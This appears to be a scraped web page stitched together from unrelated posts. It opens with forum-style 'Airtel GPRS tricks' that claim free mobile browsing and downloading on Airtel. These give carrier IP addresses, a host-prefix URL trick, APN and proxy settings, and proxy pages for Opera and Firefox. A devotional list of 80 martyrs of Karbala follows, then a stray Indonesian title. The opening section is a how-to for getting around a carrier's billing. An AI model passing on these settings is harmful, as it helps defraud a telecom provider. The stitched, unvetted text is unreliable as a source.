(plz open it in new tab)

so its nothing but to surf via google appspot proxy enginee and resume downloading via .de german proxy field

Airtel gprs tricks seems to be back again

Airtel gprs tricks seems to be back again


Airtel gprs tricks seems to be back again.I had this info in a huge a forum and people seem to have it working using the  below 41 ips.This trick works similar to the 0.facebook.com free browsing trick.Using the below ip address you can access free gprs in airtel mobile office.

eg. for this trick

[1] DOT(ip<dot>site/server) trick
e.g.
Code: [Select]http://122.170.122.201.www.flyproxy.com
http://122.170.122.201.server4.operamini.com

below are the ip addresses from last month
[1]  122.170.122.191
[2]  122.170.122.192
[3]  122.170.122.193
[4]  122.170.122.201
[5]  122.170.122.202
[6]  122.170.122.210
[7]  122.170.122.211
[8]  122.170.122.212
[9]  122.170.122.213
[10]  122.170.122.214
[11]  122.170.122.215
Hack Airtel For Free Downloading And Browsing In Pc And Mobile

Hack Airtel For Free Downloading And Browsing In Pc And Mobile


Hack Airtel For Free Downloading And Browsing In Pc And Mobile

Finally, A new & 100% working free browsing & downloading trick for all Airtel users. I have already tested this trick using Opera 8.65 on my mobile & Mozilla Firefox on PC & its working with superb speed. So here i am sharing this trick with you all:




For Mobile Using Opera:

Configure your GPRS settings as follows:


Access Point Name: airtelgprs.com


p.r.o.x.y: anduin.net


Port: 80 (Remember its 80 not 8080)


(Note: Your balance should be less than 30paise)






Now open your Opera browser & go to

 http://wap.mauj.com/~cactuz/proxy/index.php

 A new web page opens, now enter any website link & Enjoy!!!!!!!!!! free browsing & downloading.






For Mozilla Firefox or Opera on PC:


Use PC suite to connect your PC to airtelgprs.com,


Now open Firefox browser, Go to Tools --> Advanced --> Network --> Settings -->& configure HTTP proxy settings as follows:


proxy: anduin.net


Port: 80


Now again goto Tools --> Options --> General --> & reset your home page to

 http://wap.mauj.com/~cactuz/proxy/index.php


Now restart your browser & go to your home page, A new web page opens, now enter any website link & Enjoy!!!!!!!!!! free browsing & downloading.

Names of Martyrs who sacrificed their lives at Karbala

Names of Martyrs who sacrificed their lives at Karbala


Names of Martyrs who sacrificed their lives at Karbala for the sake of the lofty principles of Islam as mentioned in "Ziyarah al-Nahiyyah"

1. Imam Husayn ibn Ali (Amir al Mu'mineen)
grandson of Prophet Muhammad (s.a)
(killed by Shimr Dhiljaushan)
2. Ali al-Akbar ibn Husayn ibn Ali
(killed by Murrah bin Munqiz bin Noman al Abdi)
3. Abdullah (also known as Ali al-Asghar) ibn Husayn ibn Ali
(killed by Harmala ibn Kahil al Asadi)
4. Abdullah ibn Ali (Amir al Mu'mineen)
(killed by Hani bin Thubaet al Hadhrami)
5. Abul Fadhl al Abbas ibn Ali (Amir al Mu'mineen)
(killed by Yazeed bin Ruqaad al Heeti and Hakeem bin Tufail al Taai)
6. Ja'far ibn Ali (Amir al Mu'mineen)
(killed by Hani bin Thubaet al Hadhrami)
7. Uthman ibn Ali (Amir al Mu'mineen)
(killed by Khooli bin Yazeed al Adhbahi al Ayadi and Abaani al Daarimi)
8. Muhammad ibn Ali (Amir al Mu'mineen)
(killed by Abaani al Daarimi)
9. Abi Bakr ibn al Hassan ibn Ali
(killed by Abdullah bin Aqabah al Ghanavi)
10. Abdullah ibn al Hassan ibn Ali
(killed by Harmala bin Kahil al Asadi)
11. Qasim ibn al Hassan ibn Ali
(killed by Umar bin Sa'd bin Nufail al Azdi)
12. Aun ibn Abdullah ibn Ja'far al Tayyar
(killed by Abdullah bin Kutayya al Nabahani)
13. Muhammad ibn Abdullah ibn Ja'far al Tayyar
(killed by Aamir bin Nahshal al Tameemi)
14. Ja'far ibn Aqeel
(killed by Khalid bin Asad al Johani)
15. Abdullah ibn Muslim ibn Aqeel
(killed by Aamir bin Sa'sa'ah)
16. Abu Abdullah ibn Muslim ibn Aqeel
(killed by Amr bin Sudaih Saedavi)
17. Muhammad ibn Abu Saeed ibn Aqeel
(killed by Laqeet bin Naashir al Johani)
18. Sulaiman, slave of Imam Husayn
(killed by Sulaiman bin Auf Hadhrami)
19. Qaarib, slave of Imam Husayn
20. Munjeh, slave of Imam Husayn
21. Muslim ibn Ausajah al Asadi
(killed by Abdullah al Dhubabi and Abdullah Khashkara al Bajali)
22. Saeed ibn Abdullah al Hanafi
23. Bishr ibn Amr al Khadhrami
24. Yazeed ibn al Haseen
(reciter of Qur'an)
25. Imran ibn al Kalb al Ansari
26. Na'eem ibn al Ajlan al Ansari
27. Zuhair ibn al Qain al Bajali
28. Amr ibn Qurzah al Ansari
29. Habeeb ibn Madhahir al Asadi
30. Hurr ibn Yazeed al Reyahi
31. Abdullah ibn al Umair al Kalbi
32. Nafe ibn al Hilal al Jamali al-Muradi
33. Anas ibn Kahil ibn al Harth al Asadi
34. Qais ibn al Mussahar al Saedawi
35. Abdullah ibn Urwah ibn al Harraaq al Ghifaaree
36. Abdul Rahman ibn Urwah ibn al Harraaq al-Ghifaaree
37. Shabeeb ibn Abdullah Nahshali
38. Jaun, slave of Abu Dharr al-Ghifaree
39. Hujjaj ibn Zaid Sa'di
40. Qasit ibn Zuhair al-Tha'labee
41. Kursh (Muqsit) ibn Zuhair al-Thalabee
42. Kinaanah ibn Ateeq
43. Dhargham ibn Maalik
44. Jowain ibn Maalik al-Dhabaai
45. Zaid ibn Thubait al-Qaesi
46. Abdullah ibn Zaid ibn Thubait al-Qaesi
47. Ubaidullah ibn Zaid ibn Thubait al-Qaesi
48. Amir ibn Muslim
49. Qa'nab ibn Amr al-Namari
50. Salim, slave of Amir ibn Muslim
51. Saif ibn Malik
52. Zuhair ibn Bashi al-Khath'ami
53. Zaid ibn Me'qal al-Jo'afi
54. Hujjaj ibn Masrooq al-Jo'afi
55. Mas'ood ibn Hajjaj
56. Son (name not known) of Mas'ood ibn Hajjaj
57. Majma' ibn Abdullah al-Aezi
58. Ammar ibn Hassan ibn Shuraib al-Taai
59. Hayyan ibn Haarith al-Salmaani al-Azdi
60. Jundab ibn Hujair al-Khanlani
61. Umar ibn Khalid al-Saedaawi
62. Saeed, slave of Umar ibn Khalid
63. Yazid ibn Ziad ibn Mazahi al-Kindi
64. Zaahir, slave of Amir ibn Humuq al-Khuzaa'ee
65. Jabalah ibn Ali al-Shaybani
66. Saalim, slave of Bani Medinat al-Kalbi
67. Aslam ibn Khateer al-Azdi
68. Zuhair ibn Sulaim al-Azdi
69. Qasim ibn Habeeb al-Azdi
70. Umar ibn al-Ohdooth al-Hadhrami
71. Abu Thamaamah, Umar ibn Abdullah al-Saaedi
72. Hanzalah ibn As'ad al-Shaami
73. Abdul-Rahman ibn Abdullah al-Arhabi
74. Ammaar ibn Abu Salaamah al-Hamdaami
75. Aabis ibn Shabeeb al-Shaakiree
76. Shaozab, slave of Shaaki
77. Shabeeb ibn Haarith ibn Saree
78. Maalik ibn Abdullah ibn Saree
79. Sawwar ibn Abi Uman al-Nohami al-Hamdani*
80. Amar ibn Abdullah al-Junda'i**

* Wounded Martyr who was captured and died in prison
** Pierced together with Martyr No. 79
Cara Membuat Situs Iklan Baris